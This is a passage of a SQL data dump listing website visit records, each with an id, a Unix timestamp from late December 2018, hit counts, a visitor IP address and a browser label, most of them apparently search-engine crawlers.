55.39.247','other'),(359240,1545883818,5,5,0,0,'216.244.66.241','other'),(359241,1545883881,1,1,0,0,'54.36.148.68','other'),(359242,1545883993,1,1,0,0,'54.36.148.53','other'),(359243,1545884144,1,1,0,0,'54.36.148.64','other'),(359244,1545884174,1,1,0,0,'54.36.149.79','other'),(359245,1545884215,1,1,0,0,'54.36.149.36','other'),(359246,1545884253,1,1,0,0,'46.229.168.130','other'),(359247,1545884416,6,6,0,0,'5.45.207.19','other'),(359248,1545884420,1,1,0,0,'87.250.224.47','other'),(359249,1545884501,1,1,0,0,'54.36.148.123','other'),(359250,1545884521,1,1,0,0,'54.36.149.80','other'),(359251,1545884570,9,9,0,0,'5.45.207.79','other'),(359252,1545884641,1,1,0,0,'54.36.148.157','other'),(359253,1545884650,1,1,0,0,'141.8.183.22','other'),(359254,1545884662,1,1,0,0,'46.229.168.151','other'),(359255,1545884700,1,1,0,0,'213.180.203.9','other'),(359256,1545884703,1,1,0,0,'95.108.181.75','other'),(359257,1545884788,5,5,0,0,'178.154.244.11','other'),(359258,1545884960,2,2,0,0,'95.108.181.54','other'),(359259,1545884963,1,1,0,0,'87.250.224.64','other'),(359260,1545885168,1,1,0,0,'54.36.148.133','other'),(359261,1545885256,2,2,0,0,'141.8.142.103','other'),(359262,1545885338,2,2,0,0,'95.108.213.4','other'),(359263,1545885387,1,1,0,0,'87.250.224.47','other'),(359264,1545885417,1,1,0,0,'54.36.148.47','other'),(359265,1545885471,3,3,0,0,'216.244.66.241','other'),(359266,1545885487,1,1,0,0,'5.45.207.8','other'),(359267,1545885509,1,1,0,0,'46.229.168.132','other'),(359268,1545885545,2,2,0,0,'37.9.113.148','other'),(359269,1545885596,1,1,0,0,'213.180.203.17','other'),(359270,1545885688,1,1,0,0,'141.8.142.38','other'),(359271,1545885835,1,1,0,0,'5.45.207.19','other'),(359272,1545885923,1,1,0,0,'54.36.148.176','other'),(359273,1545885983,2,2,0,0,'5.45.207.79','other'),(359274,1545885994,2,2,0,0,'178.154.244.11','other'),(359275,1545886036,1,1,0,0,'54.36.148.19','other'),(359276,1545886087,1,1,0,0,'46.229.168.154','other'),(359277,1545886103,1,1,0,0,'54.36.149.16','other'),(359278,1545886572,7,7,0,0,'216.244.66.241','other'),(359279,1545886650,1,1,0,0,'54.36.149.34','other'),(359280,1545886787,1,1,0,0,'46.229.168.133','other'),(359281,1545886891,1,1,0,0,'54.36.148.77','other'),(359282,1545886937,1,1,0,0,'66.249.66.40','chrome'),(359283,1545886943,1,1,0,0,'54.36.148.15','other'),(359284,1545886954,1,1,0,0,'54.36.148.132','other'),(359285,1545887169,1,1,0,0,'54.36.149.64','other'),(359286,1545887273,1,1,0,0,'54.36.149.97','other'),(359287,1545887413,1,1,0,0,'66.249.66.44','chrome'),(359288,1545887473,1,1,0,0,'54.36.148.53','other'),(359289,1545888080,1,1,0,0,'66.249.66.156','chrome'),(359290,1545888097,1,1,0,0,'54.36.149.86','other'),(359291,1545888103,1,1,0,0,'54.36.149.88','other'),(359292,1545888146,1,1,0,0,'54.36.149.67','other'),(359293,1545888162,1,1,0,0,'88.99.2.203','other'),(359294,1545888180,1,1,0,0,'54.36.149.72','other'),(359295,1545888184,1,1,0,0,'136.243.70.68','other'),(359296,1545888359,1,1,0,0,'54.36.149.53','other'),(359297,1545888444,1,1,0,0,'216.244.66.241','other'),(359298,1545888473,1,1,0,0,'46.229.168.145','other'),(359299,1545888501,1,1,0,0,'54.36.148.126','other'),(359300,1545888719,1,1,0,0,'54.36.148.123','other'),(359302,1545888783,1,1,0,0,'54.36.148.196','other'),(359303,1545889100,1,1,0,0,'37.9.113.103','other'),(359304,1545889113,1,1,0,0,'54.36.148.243','other'),(359305,1545889150,2,2,0,0,'95.108.213.4','other'),(359306,1545889197,1,1,0,0,'54.36.149.8','other'),(359307,1545889322,4,4,0,0,'5.45.207.79','other'),(359308,1545889350,2,2,0,0,'5.45.207.19','other'),(359309,1545889395,2,2,0,0,'141.8.142.103','other'),(359310,1545889398,1,1,0,0,'8.29.198.25','other'),(359311,1545889414,4,4,0,0,'178.154.244.11','other'),(359312,1545889426,1,1,0,0,'54.36.148.150','other'),(359313,1545889502,1,1,0,0,'54.36.149.0','other'),(359314,1545889583,1,1,0,0,'207.46.13.103','other'),(359315,1545889595,5,5,0,0,'216.244.66.241','other'),(359316,1545889658,1,1,0,0,'54.36.148.139','other'),(359317,1545890013,1,1,0,0,'54.36.149.55','other'),(359318,1545890232,1,1,0,0,'54.36.148.102','other'),(359319,1545890326,1,1,0,0,'54.36.148.90','other'),(359320,1545890461,1,1,0,0,'54.36.148.252','other'),(359321,1545890483,1,1,0,0,'8.29.198.26','other'),(359322,1545890537,1,1,0,0,'207.46.13.16','other'),(359323,1545890984,1,1,0,0,'54.36.148.205','other'),(359324,1545891148,1,1,0,0,'54.36.148.85','other'),(359325,1545891165,1,1,0,0,'54.36.149.4','other'),(359326,1545891166,1,1,0,0,'157.55.39.214','other'),(359327,1545891180,1,1,0,0,'54.36.149.24','other'),(359328,1545891333,1,1,0,0,'216.244.66.241','other'),(359329,1545891371,1,1,0,0,'54.36.148.172','other'),(359330,1545891377,1,1,0,0,'54.36.149.45','other'),(359331,1545891812,1,1,0,0,'54.36.148.177','other'),(359332,1545891912,1,1,0,0,'54.36.148.152','other'),(359333,1545892044,1,1,0,0,'54.36.149.48','other'),(359334,1545892343,1,1,0,0,'54.36.148.190','other'),(359335,1545892349,1,1,0,0,'18.184.52.215','other'),(359336,1545892451,7,7,0,0,'216.244.66.241','other'),(359337,1545892620,1,1,0,0,'54.36.148.157','other'),(359338,1545892682,1,1,0,0,'54.36.149.47','other'),(359339,1545892697,3,3,0,0,'91.196.178.83','chrome'),(359340,1545892821,1,1,0,0,'54.36.149.18','other'),(359341,1545893001,1,1,0,0,'54.36.148.253','other'),(359342,1545893156,1,1,0,0,'93.75.192.58','firefox'),(359343,1545893412,1,1,0,0,'54.36.148.31','other'),(359344,1545893434,1,1,0,0,'66.249.66.156','chrome'),(359345,1545893435,1,1,0,0,'66.249.66.154','chrome'),(359346,1545893505,1,1,0,0,'54.36.149.68','other'),(359347,1545893600,1,1,0,0,'54.36.149.91','other'),(359348,1545893601,1,1,0,0,'54.36.149.2','other'),(359349,1545893608,1,1,0,0,'54.36.149.35','other'),(359350,1545893651,1,1,0,0,'39.98.171.75','other'),(359351,1545893888,1,1,0,0,'54.36.149.97','other'),(359352,1545893894,1,1,0,0,'54.36.148.133','other'),(359353,1545894153,1,1,0,0,'157.55.39.247','other'),(359354,1545894325,1,1,0,0,'141.170.249.23','chrome'),(359355,1545894439,1,1,0,0,'54.36.148.105','other'),(359356,1545894489,1,1,0,0,'46.229.168.129','other'),(359357,1545894607,1,1,0,0,'54.36.148.171','other'),(359358,1545894608,1,1,0,0,'46.229.168.130','other'),(359359,1545894610,1,1,0,0,'46.229.168.142','other'),(359360,1545894663,1,1,0,0,'54.36.149.78','other'),(359361,1545894776,1,1,0,0,'54.36.149.44','other'),(359362,1545894818,1,1,0,0,'54.36.148.189','other'),(359363,1545894823,1,1,0,0,'54.36.148.75','other'),(359364,1545894877,1,1,0,0,'54.36.149.26','other'),(359365,1545894923,1,1,0,0,'54.36.148.206','other'),(359366,1545894949,1,1,0,0,'54.36.148.181','other'),(359367,1545895318,1,1,0,0,'54.36.148.243','other'),(359368,1545895333,4,4,0,0,'216.244.66.241','other'),(359369,1545895382,1,1,0,0,'88.99.2.203','other'),(359370,1545895609,1,1,0,0,'54.36.148.34','other'),(359371,1545895748,1,1,0,0,'54.36.149.25','other'),(359372,1545895773,1,1,0,0,'54.36.149.28','other'),(359373,1545895789,1,1,0,0,'54.36.148.55','other'),(359374,1545895953,1,1,0,0,'66.249.66.152','chrome'),(359375,1545896122,1,1,0,0,'46.229.168.152','other'),(359376,1545896286,1,1,0,0,'5.45.207.19','other'),(359377,1545896390,1,1,0,0,'54.36.148.51','other'),(359378,1545896461,1,1,0,0,'54.36.148.209','other'),(359379,1545896468,2,2,0,0,'95.108.213.4','other'),(359380,1545896519,2,2,0,0,'139.81.97.250','chrome'),(359381,1545896776,2,2,0,0,'91.196.178.168','chrome'),(359382,1545896873,1,1,0,0,'54.36.148.24','other'),(359383,1545897240,1,1,0,0,'5.45.207.19','other'),(359384,1545897383,1,1,0,0,'157.55.39.193','other'),(359385,1545897451,1,1,0,0,'54.36.148.250','other'),(359386,1545897514,1,1,0,0,'54.36.148.243','other'),(359387,1545897627,5,5,0,0,'5.83.23.13','chrome'),(359388,1545897693,1,1,0,0,'54.36.148.100','other'),(359389,1545898031,1,1,0,0,'46.229.168.135','other'),(359390,1545898376,1,1,0,0,'46.229.168.143','other'),(359391,1545898408,1,1,0,0,'54.36.149.28','other'),(359392,1545898441,3,3,0,0,'216.244.66.241','other'),(359393,1545898543,1,1,0,0,'54.36.149.25','other'),(359394,1545898579,1,1,0,0,'54.36.148.97','other'),(359395,1545898587,1,1,0,0,'54.36.148.208','other'),(359396,1545898743,1,1,0,0,'178.154.244.11','other'),(359397,1545898767,1,1,0,0,'54.36.148.233','other'),(359398,1545899214,1,1,0,0,'66.249.66.152','chrome'),(359399,1545899298,1,1,0,0,'54.36.149.84','other'),(359400,1545899416,1,1,0,0,'54.36.149.66','other'),(359401,1545899721,1,1,0,0,'91.196.178.168','chrome'),(359402,1545899931,1,1,0,0,'157.55.39.193','other'),(359403,1545899940,1,1,0,0,'54.36.148.19','other'),(359404,1545899960,1,1,0,0,'54.36.149.71','other'),(359405,1545900073,1,1,0,0,'213.180.203.9','other'),(359406,1545900076,1,1,0,0,'5.45.207.79','other'),(359407,1545900155,1,1,0,0,'54.36.148.208','other'),(359408,1545900175,1,1,0,0,'37.9.113.20','other'),(359409,1545900212,1,1,0,0,'141.8.142.103','other'),(359410,1545900224,2,2,0,0,'178.154.244.11','other'),(359411,1545900231,1,1,0,0,'8.29.198.27','other'),(359412,1545900236,1,1,0,0,'54.36.149.100','other'),(359413,1545900259,2,2,0,0,'5.45.207.19','other'),(359414,1545900335,1,1,0,0,'54.36.148.122','other'),(359415,1545900489,2,2,0,0,'91.196.178.178','chrome'),(359416,1545900547,1,1,0,0,'87.250.224.118','other'),(359417,1545900593,1,1,0,0,'141.8.183.23','other'),(359418,1545900628,1,1,0,0,'37.9.113.148','other'),(359419,1545900630,1,1,0,0,'87.250.224.65','other'),(359420,1545900651,1,1,0,0,'40.77.167.133','other'),(359421,1545900704,1,1,0,0,'213.180.203.40','other'),(359422,1545900971,1,1,0,0,'37.53.90.175','chrome'),(359423,1545901080,1,1,0,0,'54.36.148.148','other'),(359424,1545901269,1,1,0,0,'54.36.148.165','other'),(359425,1545901277,3,3,0,0,'216.244.66.241','other'),(359426,1545901324,1,1,0,0,'8.29.198.27','other'),(359427,1545901332,1,1,0,0,'54.36.148.19','other'),(359428,1545901358,1,1,0,0,'54.36.148.171','other'),(359429,1545901407,1,1,0,0,'54.36.148.254','other'),(359430,1545901666,2,2,0,0,'91.196.178.168','chrome'),(359431,1545901888,1,1,0,0,'54.36.149.0','other'),(359432,1545901896,1,1,0,0,'54.36.148.17','other'),(359433,1545902260,1,1,0,0,'5.45.207.19','other'),(359435,1545902353,1,1,0,0,'46.229.168.132','other'),(359436,1545902388,1,1,0,0,'54.36.148.41','other'),(359437,1545902471,1,1,0,0,'54.36.148.24','other'),(359438,1545902516,1,1,0,0,'54.36.148.63','other'),(359439,1545902582,1,1,0,0,'88.99.2.203','other'),(359440,1545902602,1,1,0,0,'54.36.149.24','other'),(359441,1545902915,1,1,0,0,'54.36.148.115','other'),(359442,1545902943,1,1,0,0,'157.55.39.193','other'),(359443,1545903060,1,1,0,0,'54.36.148.107','other'),(359444,1545903147,1,1,0,0,'91.196.178.84','chrome'),(359445,1545903283,1,1,0,0,'54.36.149.13','other'),(359446,1545903343,1,1,0,0,'46.229.168.136','other'),(359447,1545903508,1,1,0,0,'54.36.148.113','other'),(359448,1545903575,1,1,0,0,'207.46.13.103','other'),(359449,1545903946,2,2,0,0,'130.180.218.127','chrome'),(359450,1545903978,1,1,0,0,'46.229.168.147','other'),(359451,1545903980,1,1,0,0,'46.229.168.151','other'),(359452,1545903986,1,1,0,0,'46.229.168.146','other'),(359453,1545904083,1,1,0,0,'54.36.148.50','other'),(359454,1545904187,1,1,0,0,'46.229.168.135','other'),(359455,1545904206,3,3,0,0,'216.244.66.241','other'),(359456,1545904454,1,1,0,0,'54.36.148.26','other'),(359457,1545904522,1,1,0,0,'54.36.148.23','other'),(359458,1545904668,2,2,0,0,'77.120.177.211','chrome'),(359459,1545904891,1,1,0,0,'54.36.149.81','other'),(359460,1545904893,1,1,0,0,'46.229.168.152','other'),(359461,1545904968,1,1,0,0,'54.36.148.229','other'),(359462,1545905164,2,2,0,0,'95.132.61.135','firefox'),(359463,1545905262,1,1,0,0,'40.77.167.133','other'),(359464,1545905421,1,1,0,0,'54.36.148.212','other'),(359465,1545905459,1,1,0,0,'54.36.149.41','other'),(359466,1545905529,1,1,0,0,'54.36.148.125','other'),(359467,1545905530,1,1,0,0,'66.249.66.154','chrome'),(359468,1545905532,1,1,0,0,'91.196.178.101','chrome'),(359469,1545905540,1,1,0,0,'54.36.148.62','other'),(359470,1545905644,1,1,0,0,'216.244.66.241','other'),(359471,1545905657,1,1,0,0,'54.36.148.235','other'),(359472,1545905680,1,1,0,0,'213.180.203.40','other'),(359473,1545905747,1,1,0,0,'54.36.149.85','other'),(359474,1545905838,2,2,0,0,'54.36.149.31','other'),(359475,1545906108,1,1,0,0,'54.36.148.102','other'),(359476,1545906477,2,2,0,0,'54.36.149.6','other'),(359477,1545906639,1,1,0,0,'46.229.168.133','other'),(359478,1545906641,1,1,0,0,'46.229.168.150','other'),(359479,1545906651,1,1,0,0,'5.45.207.8','other'),(359480,1545906782,1,1,0,0,'54.36.148.182','other'),(359481,1545906922,1,1,0,0,'54.36.149.95','other'),(359482,1545906936,1,1,0,0,'95.108.181.54','other'),(359483,1545906958,6,6,0,0,'216.244.66.241','other'),(359484,1545906966,1,1,0,0,'37.9.113.148','other'),(359485,1545907078,1,1,0,0,'213.180.203.40','other'),(359486,1545907085,2,2,0,0,'178.154.244.11','other'),(359487,1545907146,1,1,0,0,'54.36.148.116','other'),(359488,1545907299,1,1,0,0,'87.250.224.118','other'),(359489,1545907341,1,1,0,0,'95.163.255.107','other'),(359490,1545907352,1,1,0,0,'54.36.148.78','other'),(359491,1545907384,1,1,0,0,'54.36.149.41','other'),(359492,1545907394,2,2,0,0,'5.45.207.79','other'),(359493,1545907397,1,1,0,0,'178.154.171.60','other'),(359494,1545907416,1,1,0,0,'178.154.200.48','other'),(359495,1545907430,1,1,0,0,'141.8.142.103','other'),(359496,1545907438,1,1,0,0,'37.9.113.103','other'),(359497,1545907448,1,1,0,0,'141.8.142.108','other'),(359498,1545907451,1,1,0,0,'213.180.203.17','other'),(359499,1545907453,1,1,0,0,'141.8.142.144','other'),(359500,1545907473,1,1,0,0,'95.108.213.4','other'),(359501,1545907503,1,1,0,0,'93.158.166.7','other'),(359502,1545907519,1,1,0,0,'54.36.149.35','other'),(359503,1545907567,1,1,0,0,'54.36.148.67','other'),(359504,1545907660,1,1,0,0,'87.250.224.65','other'),(359505,1545907767,2,2,0,0,'91.196.178.163','chrome'),(359506,1545907793,1,1,0,0,'46.229.168.137','other'),(359507,1545907798,1,1,0,0,'54.36.148.59','other'),(359508,1545907942,1,1,0,0,'54.36.148.172','other'),(359509,1545908230,1,1,0,0,'54.36.149.81','other'),(359510,1545908262,1,1,0,0,'54.36.148.95','other'),(359511,1545908349,1,1,0,0,'95.163.255.107','other'),(359512,1545908621,1,1,0,0,'54.36.149.93','other'),(359513,1545908697,1,1,0,0,'40.77.167.24','other'),(359514,1545908784,1,1,0,0,'54.36.148.139','other'),(359515,1545908838,1,1,0,0,'141.8.142.108','other'),(359516,1545908987,1,1,0,0,'95.163.255.114','other'),(359517,1545909443,1,1,0,0,'95.163.255.117','other'),(359518,1545909580,1,1,0,0,'46.229.168.145','other'),(359519,1545909770,5,5,0,0,'216.244.66.241','other'),(359520,1545909894,1,1,0,0,'54.36.149.71','other'),(359521,1545910074,1,1,0,0,'95.163.255.108','other'),(359522,1545910119,1,1,0,0,'54.36.148.233','other'),(359523,1545910240,1,1,0,0,'54.36.148.180','other'),(359524,1545910297,1,1,0,0,'54.36.148.170','other'),(359525,1545910298,1,1,0,0,'86.63.87.242','firefox'),(359526,1545910311,2,2,0,0,'95.163.255.112','other'),(359527,1545910406,1,1,0,0,'54.36.148.145','other'),(359528,1545910424,1,1,0,0,'95.108.213.4','other'),(359529,1545910612,1,1,0,0,'5.45.207.79','other'),(359530,1545910729,2,2,0,0,'87.250.224.47','other'),(359531,1545910874,2,2,0,0,'95.163.255.107','other'),(359532,1545910986,1,1,0,0,'95.163.255.191','other'),(359533,1545910989,1,1,0,0,'95.163.255.156','other'),(359534,1545911060,1,1,0,0,'8.29.198.27','other'),(359535,1545911065,1,1,0,0,'54.36.149.42','other'),(359536,1545911099,2,2,0,0,'95.163.255.106','other'),(359537,1545911112,1,1,0,0,'95.163.255.116','other'),(359538,1545911134,1,1,0,0,'54.36.148.217','other'),(359539,1545911230,2,2,0,0,'54.185.164.188','firefox'),(359540,1545911271,1,1,0,0,'216.244.66.241','other'),(359541,1545911416,6,6,0,0,'207.46.13.103','other'),(359542,1545911542,1,1,0,0,'207.46.13.16','other'),(359543,1545911570,1,1,0,0,'54.36.148.172','other'),(359544,1545911579,1,1,0,0,'54.36.148.115','other'),(359545,1545911689,1,1,0,0,'54.36.148.123','other'),(359546,1545911854,1,1,0,0,'46.229.168.133','other'),(359547,1545911938,1,1,0,0,'54.36.149.74','other'),(359548,1545912054,1,1,0,0,'54.36.148.73','other'),(359549,1545912164,1,1,0,0,'8.29.198.26','other'),(359550,1545912229,1,1,0,0,'54.36.148.209','other'),(359551,1545912306,1,1,0,0,'95.163.255.116','other'),(359552,1545912613,1,1,0,0,'54.36.148.251','other'),(359553,1545912624,5,5,0,0,'216.244.66.241','other'),(359554,1545912645,1,1,0,0,'95.163.255.115','other'),(359555,1545912666,1,1,0,0,'66.249.66.220','chrome'),(359556,1545912775,1,1,0,0,'66.249.66.156','chrome'),(359558,1545912781,10,10,0,0,'40.77.167.24','other'),(359559,1545914037,1,1,0,0,'66.249.66.157','chrome'),(359560,1545914038,1,1,0,0,'66.249.66.152','chrome'),(359561,1545914140,1,1,0,0,'54.36.148.22','other'),(359562,1545914158,2,2,0,0,'91.196.178.83','chrome'),(359563,1545914188,1,1,0,0,'54.36.148.54','other'),(359564,1545914189,1,1,0,0,'54.36.148.12','other'),(359565,1545914224,1,1,0,0,'40.77.167.24','other'),(359566,1545914420,1,1,0,0,'46.229.168.143','other'),(359567,1545914422,1,1,0,0,'46.229.168.136','other'),(359568,1545914580,1,1,0,0,'54.36.148.230','other'),(359569,1545914635,1,1,0,0,'54.36.149.22','other'),(359570,1545914731,1,1,0,0,'5.45.207.79','other'),(359571,1545914779,2,2,0,0,'157.55.39.193','other'),(359572,1545914793,1,1,0,0,'54.36.149.46','other'),(359573,1545914817,1,1,0,0,'54.36.148.120','other'),(359574,1545914876,1,1,0,0,'91.196.178.91','chrome'),(359575,1545914974,1,1,0,0,'207.46.13.5','other'),(359576,1545915011,1,1,0,0,'54.36.148.103','other'),(359577,1545915274,2,2,0,0,'178.154.244.11','other'),(359578,1545915332,1,1,0,0,'54.36.148.134','other'),(359579,1545915615,5,5,0,0,'216.244.66.241','other'),(359580,1545915845,1,1,0,0,'54.36.148.173','other'),(359581,1545915877,6,6,0,0,'5.45.207.79','other'),(359582,1545915956,1,1,0,0,'178.154.171.24','other'),(359583,1545916062,6,6,0,0,'5.45.207.19','other'),(359585,1545916065,3,3,0,0,'141.8.142.103','other'),(359586,1545916141,1,1,0,0,'91.196.178.91','chrome'),(359587,1545916366,8,8,0,0,'178.154.244.11','other'),(359588,1545916524,1,1,0,0,'54.36.149.35','other'),(359589,1545916542,4,4,0,0,'87.250.224.47','other'),(359590,1545916587,1,1,0,0,'95.108.181.75','other'),(359591,1545916766,4,4,0,0,'95.108.213.4','other'),(359592,1545916773,1,1,0,0,'54.36.148.109','other'),(359593,1545916914,1,1,0,0,'87.250.224.65','other'),(359594,1545916957,5,5,0,0,'5.45.207.79','other'),(359595,1545917055,1,1,0,0,'95.163.255.117','other'),(359596,1545917078,2,2,0,0,'95.163.255.115','other'),(359597,1545917086,1,1,0,0,'54.36.148.136','other'),(359598,1545917141,2,2,0,0,'157.55.39.193','other'),(359599,1545917187,2,2,0,0,'5.45.207.19','other'),(359600,1545917210,1,1,0,0,'54.36.149.79','other'),(359601,1545917303,2,2,0,0,'141.8.142.103','other'),(359602,1545917413,1,1,0,0,'216.244.66.241','other'),(359603,1545917430,3,3,0,0,'178.154.244.11','other'),(359604,1545917448,1,1,0,0,'46.229.168.133','other'),(359605,1545917457,3,3,0,0,'91.196.177.28','chrome'),(359606,1545917471,1,1,0,0,'69.84.121.123','other'),(359607,1545917507,1,1,0,0,'95.163.255.119','other'),(359608,1545917553,1,1,0,0,'207.46.13.103','other'),(359609,1545917575,1,1,0,0,'54.36.148.103','other'),(359610,1545917591,1,1,0,0,'54.36.149.53','other'),(359611,1545917857,1,1,0,0,'40.77.167.24','other'),(359612,1545917904,1,1,0,0,'54.36.148.75','other'),(359613,1545917967,7,7,0,0,'5.45.207.79','other'),(359614,1545918001,1,1,0,0,'54.36.148.56','other'),(359615,1545918033,1,1,0,0,'54.36.148.214','other'),(359616,1545918108,1,1,0,0,'54.36.149.50','other'),(359617,1545918144,1,1,0,0,'54.36.149.73','other'),(359618,1545918428,3,3,0,0,'216.244.66.241','other'),(359619,1545918496,1,1,0,0,'178.154.244.11','other'),(359620,1545918580,1,1,0,0,'83.170.203.202','chrome'),(359621,1545918606,1,1,0,0,'54.36.148.187','other'),(359622,1545918699,1,1,0,0,'54.36.149.54','other'),(359623,1545918828,1,1,0,0,'54.36.148.210','other'),(359624,1545919104,1,1,0,0,'54.36.148.17','other'),(359625,1545919136,1,1,0,0,'54.36.149.25','other'),(359626,1545919168,1,1,0,0,'54.36.149.21','other'),(359627,1545919173,1,1,0,0,'46.229.168.142','other'),(359628,1545919174,1,1,0,0,'46.229.168.144','other'),(359629,1545919357,1,1,0,0,'46.229.168.135','other'),(359630,1545919410,1,1,0,0,'185.107.70.202','other'),(359631,1545919411,1,1,0,0,'185.220.101.7','other'),(359632,1545919888,1,1,0,0,'180.76.15.147','other'),(359633,1545919889,1,1,0,0,'180.76.15.21','other'),(359634,1545920110,1,1,0,0,'91.236.184.19','firefox'),(359635,1545920212,1,1,0,0,'178.154.171.17','other'),(359636,1545920285,1,1,0,0,'54.36.148.13','other'),(359637,1545920355,2,2,0,0,'93.183.215.81','chrome'),(359638,1545920393,1,1,0,0,'54.36.148.69','other'),(359639,1545920732,1,1,0,0,'54.36.149.79','other'),(359640,1545920845,2,2,0,0,'91.196.178.83','chrome'),(359641,1545920995,1,1,0,0,'54.36.148.156','other'),(359642,1545921355,6,6,0,0,'216.244.66.241','other'),(359643,1545921360,1,1,0,0,'157.55.39.188','other'),(359644,1545921403,1,1,0,0,'54.36.148.105','other'),(359645,1545921808,3,3,0,0,'91.236.184.19','firefox'),(359646,1545921891,1,1,0,0,'8.29.198.26','other'),(359647,1545922048,1,1,0,0,'54.36.149.48','other'),(359648,1545922136,1,1,0,0,'54.36.148.221','other'),(359649,1545922218,1,1,0,0,'54.36.148.118','other'),(359650,1545922226,1,1,0,0,'213.180.203.9','other'),(359651,1545922333,2,2,0,0,'87.250.224.118','other'),(359652,1545922371,1,1,0,0,'178.154.171.24','other'),(359653,1545922453,1,1,0,0,'216.244.66.241','other'),(359654,1545922485,1,1,0,0,'95.108.213.4','other'),(359655,1545922546,1,1,0,0,'66.249.66.42','chrome'),(359656,1545922599,1,1,0,0,'37.9.113.103','other'),(359657,1545922708,1,1,0,0,'213.180.203.17','other'),(359658,1545922841,1,1,0,0,'5.45.207.8','other'),(359659,1545922963,1,1,0,0,'141.8.183.23','other'),(359660,1545922991,1,1,0,0,'54.36.148.238','other'),(359661,1545923007,1,1,0,0,'8.29.198.27','other'),(359662,1545923044,1,1,0,0,'87.250.224.47','other'),(359663,1545923063,1,1,0,0,'54.36.148.35','other'),(359664,1545923123,1,1,0,0,'37.9.113.20','other'),(359665,1545923143,1,1,0,0,'141.8.132.16','other'),(359666,1545923252,1,1,0,0,'54.36.148.126','other'),(359667,1545923331,1,1,0,0,'54.36.149.69','other'),(359668,1545923334,1,1,0,0,'54.36.148.120','other'),(359669,1545923495,1,1,0,0,'141.8.142.108','other'),(359670,1545923531,1,1,0,0,'54.36.149.45','other'),(359671,1545923601,2,2,0,0,'66.249.66.42','chrome'),(359672,1545923830,1,1,0,0,'54.36.148.89','other'),(359673,1545923917,1,1,0,0,'54.36.148.214','other'),(359674,1545923923,1,1,0,0,'178.154.171.17','other'),(359675,1545923956,1,1,0,0,'5.45.207.79','other'),(359676,1545924123,1,1,0,0,'54.36.149.97','other'),(359677,1545924211,1,1,0,0,'178.154.171.27','other'),(359678,1545924214,2,2,0,0,'216.244.66.241','other'),(359679,1545924300,1,1,0,0,'54.36.148.140','other'),(359680,1545924365,1,1,0,0,'54.36.148.169','other'),(359681,1545924373,1,1,0,0,'54.36.149.64','other'),(359682,1545924524,1,1,0,0,'54.36.148.181','other'),(359683,1545924602,1,1,0,0,'54.36.148.92','other'),(359684,1545924672,1,1,0,0,'46.229.168.133','other'),(359685,1545924895,1,1,0,0,'54.36.148.172','other'),(359686,1545925007,1,1,0,0,'141.8.142.38','other'),(359687,1545925053,1,1,0,0,'213.180.203.9','other'),(359688,1545925119,1,1,0,0,'141.8.183.23','other'),(359689,1545925152,1,1,0,0,'141.8.142.103','other'),(359690,1545925155,1,1,0,0,'141.8.142.108','other'),(359691,1545925188,1,1,0,0,'54.36.148.52','other'),(359692,1545925267,2,2,0,0,'37.9.113.148','other'),(359693,1545925290,1,1,0,0,'54.36.149.42','other'),(359694,1545925330,1,1,0,0,'213.180.203.17','other'),(359695,1545925357,1,1,0,0,'213.180.203.40','other'),(359696,1545925364,2,2,0,0,'66.249.66.154','chrome'),(359697,1545925412,1,1,0,0,'141.8.132.16','other'),(359698,1545925416,1,1,0,0,'141.8.142.144','other'),(359699,1545925516,1,1,0,0,'87.250.224.47','other'),(359700,1545925561,2,2,0,0,'195.211.173.40','chrome'),(359701,1545925647,1,1,0,0,'5.45.207.79','other'),(359702,1545925725,1,1,0,0,'23.103.64.39','other'),(359703,1545925754,1,1,0,0,'5.45.207.19','other'),(359704,1545925881,1,1,0,0,'54.36.148.252','other'),(359705,1545926071,1,1,0,0,'54.36.149.77','other'),(359706,1545926118,1,1,0,0,'216.244.66.241','other'),(359707,1545926197,1,1,0,0,'46.229.168.153','other'),(359708,1545926410,1,1,0,0,'37.9.113.20','other'),(359709,1545926529,1,1,0,0,'54.36.148.192','other'),(359710,1545926544,1,1,0,0,'141.8.132.16','other'),(359711,1545926799,1,1,0,0,'54.36.149.96','other'),(359712,1545926857,1,1,0,0,'40.77.167.73','other'),(359713,1545926967,1,1,0,0,'54.36.148.124','other'),(359714,1545927025,4,4,0,0,'216.244.66.241','other'),(359715,1545927166,1,1,0,0,'66.249.66.155','chrome'),(359716,1545927167,1,1,0,0,'66.249.66.156','chrome'),(359717,1545927189,1,1,0,0,'66.249.66.152','chrome'),(359719,1545927310,1,1,0,0,'54.36.148.123','other'),(359720,1545927358,1,1,0,0,'207.46.13.23','other'),(359721,1545927786,2,2,0,0,'141.8.183.22','other'),(359722,1545927798,1,1,0,0,'54.36.148.68','other'),(359723,1545927833,1,1,0,0,'178.154.171.24','other'),(359724,1545927835,1,1,0,0,'178.154.171.69','other'),(359725,1545927844,1,1,0,0,'93.158.166.7','other'),(359726,1545927872,2,2,0,0,'178.154.244.11','other'),(359727,1545927876,1,1,0,0,'141.8.132.16','other'),(359728,1545927931,1,1,0,0,'5.255.253.38','other'),(359729,1545927996,1,1,0,0,'87.250.224.118','other'),(359730,1545928122,2,2,0,0,'141.8.142.108','other'),(359731,1545928126,1,1,0,0,'178.154.171.27','other'),(359732,1545928144,1,1,0,0,'207.46.13.103','other'),(359733,1545928193,1,1,0,0,'141.8.142.103','other'),(359734,1545928234,1,1,0,0,'5.45.207.79','other'),(359735,1545928242,2,2,0,0,'54.36.148.43','other'),(359736,1545928406,1,1,0,0,'54.36.148.225','other'),(359737,1545928409,1,1,0,0,'54.36.149.92','other'),(359738,1545928414,1,1,0,0,'54.36.149.53','other'),(359739,1545928477,1,1,0,0,'40.77.167.24','other'),(359740,1545928529,1,1,0,0,'54.36.148.136','other'),(359741,1545928823,1,1,0,0,'178.154.244.11','other'),(359742,1545928852,1,1,0,0,'54.36.149.57','other'),(359743,1545929263,1,1,0,0,'5.45.207.79','other'),(359744,1545929266,1,1,0,0,'95.108.181.83','other'),(359745,1545929518,1,1,0,0,'54.36.148.188','other'),(359746,1545929559,1,1,0,0,'40.77.167.24','other'),(359747,1545929604,1,1,0,0,'5.45.207.19','other'),(359748,1545929692,1,1,0,0,'54.36.148.87','other'),(359749,1545929711,1,1,0,0,'54.36.148.229','other'),(359750,1545929713,1,1,0,0,'54.36.148.226','other'),(359751,1545929749,2,2,0,0,'40.77.167.73','other'),(359752,1545929806,7,7,0,0,'216.244.66.241','other'),(359753,1545929852,1,1,0,0,'54.36.148.37','other'),(359754,1545929906,1,1,0,0,'54.36.149.66','other'),(359755,1545929907,1,1,0,0,'54.36.148.243','other'),(359756,1545929945,1,1,0,0,'207.46.13.103','other'),(359757,1545930011,1,1,0,0,'54.36.149.52','other'),(359758,1545930644,2,2,0,0,'91.196.